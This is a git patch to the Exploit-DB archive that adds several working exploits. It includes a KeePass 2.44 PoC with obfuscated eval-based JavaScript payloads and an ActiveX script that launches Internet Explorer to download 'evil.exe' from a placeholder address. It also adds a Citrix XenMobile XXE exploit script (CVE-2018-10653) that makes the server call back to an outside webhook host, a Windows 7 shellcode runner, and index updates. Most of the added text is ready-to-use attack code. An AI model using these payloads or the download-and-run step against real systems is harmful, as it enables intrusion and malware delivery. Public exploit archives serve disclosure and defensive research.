From 82e6691834ca87d870b660ed162b2762c7b24143 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 23 Jan 2020 05:02:01 +0000
Subject: [PATCH] DB: 2020-01-23

4 changes to exploits/shellcodes

KeePass 2.44 - Denial of Service (PoC)

Citrix XenMobile Server 10.8 - XML External Entity Injection

Windows/7 - Screen Lock Shellcode (9 bytes)
---
 exploits/multiple/dos/47952.txt  | 109 +++++++++++++++++++++++++++++++
 exploits/windows/local/47950.txt |  11 ----
 exploits/xml/webapps/47951.py    |  47 +++++++++++++
 files_exploits.csv               |   2 +
 files_shellcodes.csv             |   1 +
 shellcodes/windows/47953.c       |  31 +++++++++
 6 files changed, 190 insertions(+), 11 deletions(-)
 create mode 100644 exploits/multiple/dos/47952.txt
 create mode 100755 exploits/xml/webapps/47951.py
 create mode 100644 shellcodes/windows/47953.c

diff --git a/exploits/multiple/dos/47952.txt b/exploits/multiple/dos/47952.txt
new file mode 100644
index 000000000..826ef9c12
--- /dev/null
+++ b/exploits/multiple/dos/47952.txt
@@ -0,0 +1,109 @@
+# Exploit Title : KeePass 2.44 - Denial of Service (PoC)
+# Product : KeePass Password Safe
+# Version : < 2.44
+# Date: 2020-01-22
+# Vendor Homepage: https://keepass.info/
+# Exploit Author: Mustafa Emre Gül
+# Website: https://emregul.com.tr/
+# Tested On : Win10 x64
+# Description : The free, open source, light-weight and easy-to-use password manager.
+
+
+PoC:
+Open KeePass > Help > About KeePass > Help (any local help area) >
+Drag&Drop HTML File
+
+Save the contents to html.
+
+
+Payload-1:
+(DoS & Run Cmd)
+
+<script type="text/javascript">
+//<![CDATA[
+<!--
+var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
+"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+
+"\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" +
+"e(x.charCodeAt(i)^(y++));}return o;}f(\\\"\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\"+
+"\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh" +
+"83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\"+
+"\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\"+
+"\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02" +
+"5\\\\\\\\025\\\\\\\\010\\\\\\\\030\\\\\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\\\" +
+"\\\\177jith\\\\\\\\\\\"\\\\|\\\\\\\\003g[TLTB[u\\\\\\\\010\\\\\\\\013OB@[U_" +
+"F\\\\\\\\016h\\\\\\\\027\\\\\\\\033\\\\\\\\006d\\\\\\\\033\\\\\\\\004gNaP\\" +
+"\\\\\\003\\\\\\\\\\\"\\\\.&:z\\\\\\\\0314\\\\\\\\033&u9(>$>;p=3=3 70=d\\\\\\"+
+"\\006y\\\\\\\\n\\\\\\\\037\\\\\\\\r<\\\\\\\\022\\\\\\\\010\\\\\\\\022\\\\\\" +
+"\\027J \\\\\\\\010\\\\\\\\004\\\\\\\\007\\\\\\\\r\\\\\\\\0177NS2\\\\\\\\035" +
+",\\\\\\\\037.\\\\\\\\001(\\\\\\\\033VWX=\\\\\\\\023\\\\\\\\026\\\\\\\\\\\\\\"+
+"\\\\\\\\\\016\\\\\\\\026l!\\\\\\\\\\\"\\\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\\\" +
+"\\\\010}\\\\\\\\000tWFTNX]\\\\\\\\004xDHBCl\\\\\\\\023\\\\\\\\033\\\\\\\\02" +
+"3\\\\\\\\024iDkV\\\\\\\\031\\\\\\\\032\\\\\\\\033\\\\\\\\177\\\\\\\\\\\\\\\\"+
+"RS`2*/j\\\\\\\\0273)`\\\\\\\\025h\\\\\\\\027n\\\\\\\\021l,=5|6,0\\\\\\\\nu\\"+
+"\\\\\\004{\\\\\\\\006yu}~\\\\\\\\003\\\\\\\\022=\\\\\\\\014CDE5\\\\\\\\002\\"+
+"\\\\\\034I\\\\\\\\031\\\\\\\\003\\\\\\\\000MSO>\\\\\\\\036\\\\\\\\006\\\\\\" +
+"\\033\\\\\\\\035\\\\\\\\033\\\\\\\\021WXYZ'\\\\\\\\016!\\\\\\\\020 !\\\\\\\\"+
+"\\\"\\\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\\\\\017IVNH\\\\\\\\033\\\\\\\\004\\"+
+"\\\\\\016\\\\\\\\023\\\\\\\\031\\\\\\\\021\\\"\\\\,28)\\\"(f};)lo,0(rtsbus." +
+"o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" +
+"=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\""+
+")"                                                                           ;
+while(x=eval(x));
+//-->
+//]]>
+</script>
+<script type="text/javascript">
+//<![CDATA[
+<!--
+var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" +
+"=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" +
+".substr(0,ol);}f(\")19,\\\"ZPdw771\\\\b77-0xjk-7=3771\\\\sp,cw$520\\\\:330\\"+
+"\\xg030\\\\jj9%530\\\\b000\\\\XZUUVX620\\\\LP\\\\\\\\Pr\\\\610\\\\KOHD400\\" +
+"\\620\\\\720\\\\\\\\\\\\WOWGPr\\\\530\\\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" +
+"30\\\\t\\\\ 520\\\\&310\\\\$n\\\\200\\\\)230\\\\/000\\\\-K530\\\\310\\\\310" +
+"\\\\n\\\\630\\\\010\\\\IULFW620\\\\600\\\\400\\\\700\\\\520\\\\=*100\\\\(70" +
+"0\\\\4500\\\\*310\\\\-u}xy8pt~}|{771\\\\itg/e771\\\\sb|`V620\\\\530\\\\NT\\" +
+"\\\\\\MdYjGh010\\\\@TVI[O410\\\\620\\\\n\\\\330\\\\ZB@CQA200\\\\SAijArGhEec" +
+"J{HaN*2S?9t)V)5,&waedtbn\\\\!010\\\\'420\\\\%n\\\\+r\\\\U]XY030\\\\PT^]\\\\" +
+"\\\\[ZY]GZEr\\\\CYQ@b~4|);/pw$:2'610\\\\?410\\\\=220\\\\vn720\\\\h520\\\\hz" +
+"f7!%$4\\\"\\\\730\\\\L\\\\\\\\JOfWdEjN420\\\\230\\\\230\\\\IU710\\\\@BE_IG]" +
+"AHyV771\\\\430\\\\300\\\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\\\\\410\\\\!B7" +
+"30\\\\330\\\\430\\\\020\\\\K030\\\\)600\\\\/L530\\\\530\\\\330\\\\600\\\\QN" +
+"C400\\\\500\\\\r\\\\320\\\\710\\\\720\\\\320\\\\M620\\\\710\\\\500\\\\2+>3?" +
+"\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" +
+";l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")"                 ;
+while(x=eval(x));
+//-->
+//]]>
+</script>
+
+
+
+Payload-2:
+(run iexplorer.exe & download infected file)
+
+<html><body>
+<script>
+function exec(cmdline, params) {
+  var fso = new ActiveXObject("Scripting.FileSystemObject");
+  fileExist = fso.FileExists(cmdline);
+  if (!fileExist) {
+    alert("The requested application is not installed.");
+  }
+  else {
+    var shell = new ActiveXObject( "WScript.Shell" );
+    if (params) {
+        params = ' ' + params;
+    }
+    else {
+        params = '';
+    }
+    shell.Run('"' + cmdline + '"' + params);
+  }
+}
+</script>
+<a href="javascript:exec('C:\\Program Files\\Internet
+Explorer\\iexplore.exe', '-nomerge
+http://ipaddress/evil.exe');">Edition Mode Active</a>
+ </body></html>
\ No newline at end of file
diff --git a/exploits/windows/local/47950.txt b/exploits/windows/local/47950.txt
index 5d9e87f28..bb8dfa2f3 100644
--- a/exploits/windows/local/47950.txt
+++ b/exploits/windows/local/47950.txt
@@ -157,13 +157,6 @@ chunk_sz=5 #number of bytes we must decrypt the password by.
 #Apparition Security
 #===================================================
 
-def haslib(lib):
-    if not lib in (name for loader, name, ispkg in iter_modules()):
-        print("[!] "+lib+ " does not exist, pip install "+lib)
-        exit()
-    return True
-
-
 def carbonftp_conf(conf_file):
     p=""
     pipe=-1
@@ -325,8 +318,6 @@ def main(args):
     global passwd_str, sz
     victim=""
 
-    haslib("clint")
-
     if args.user and args.encrypted_password:
         print("[!] Supply a victims username -u or single encrypted password -p, not both.")
         exit()
@@ -380,8 +371,6 @@ if __name__=="__main__":
 
     main(parse_args())
 
-
-
 [POC Video URL]
 https://www.youtube.com/watch?v=q9LMvAl6LfE
 
diff --git a/exploits/xml/webapps/47951.py b/exploits/xml/webapps/47951.py
new file mode 100755
index 000000000..b8b331b85
--- /dev/null
+++ b/exploits/xml/webapps/47951.py
@@ -0,0 +1,47 @@
+# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
+# Google Dork: inurl:zdm logon
+# Date: 2019-11-28
+# Exploit Author: Jonas Lejon
+# Vendor Homepage: https://www.citrix.com
+# Software Link:
+# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
+# Tested on: XenMobile
+# CVE : CVE-2018-10653
+
+#!/usr/bin/python3
+##
+## PoC exploit test for the security vulnerability CVE-2018-10653 in
+XenMobile Server 10.8 before RP2 and 10.7 before RP3
+##
+## This PoC was written by Jonas Lejon 2019-11-28
+<jonas.xenmobile@triop.se> https://triop.se
+## Reported to Citrix 2017-10, patch released 2018-05
+##
+
+import requests
+import sys
+from pprint import pprint
+import uuid
+
+# Surf to https://webhook.site and copy/paste the URL below. Used for
+XXE callback
+WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"
+
+id = str(uuid.uuid1())
+
+xml = '''<?xml version="1.0" encoding="UTF-8"
+standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' +
+WEBHOOK + id + '''/test.dtd">%j00t9; ]>'''
+
+print(id)
+
+response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
+ headers=
+{'User-Agent': 'MDM/1.0',
+'Connection': 'close',
+'Content-Type': 'application/x-apple-aspen-mdm'},
+data=xml,stream=True
+)
+print(response.content)
+print(response.text)
+pprint(response)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4978c08e6..cfe324f53 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6660,6 +6660,7 @@ id,file,description,date,author,type,platform,port
 47937,exploits/windows/dos/47937.py,"APKF Product Key Finder 2.5.8.0 - 'Name' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
 47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows,
 47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,
+47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42251,3 +42252,4 @@ id,file,description,date,author,type,platform,port
 47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php,
 47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php,
 47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java,
+47951,exploits/xml/webapps/47951.py,"Citrix XenMobile Server 10.8 - XML External Entity Injection",2020-01-22,"Jonas Lejon",webapps,xml,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index e115ce87d..621d1bf6d 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1012,3 +1012,4 @@ id,file,description,date,author,type,platform
 47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
 47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux
 47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux
+47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
diff --git a/shellcodes/windows/47953.c b/shellcodes/windows/47953.c
new file mode 100644
index 000000000..7807aa510
--- /dev/null
+++ b/shellcodes/windows/47953.c
@@ -0,0 +1,31 @@
+# Title: Windows/7 - Screen Lock Shellcode (9 bytes)
+# Author: Saswat Nayak
+# Date: 2020-01-22
+# Shellcode length 9
+# Tested on: Win 7 SP1-64
+
+/*
+***** Assembly code follows *****
+xor eax,eax
+xor ebx,ebx
+xor ecx,ecx
+mov eax,0x00000002
+mov ebx,0x00020000
+push ebx
+push al
+mov ecx,0x77661497
+call ecx
+
+
+*/
+
+char code[]=
+
+"\x31\xC0\xB8\x6F\x86\x67\x77\xFF\xD0";
+
+int main(int argc, char **argv)
+ {
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+}
\ No newline at end of file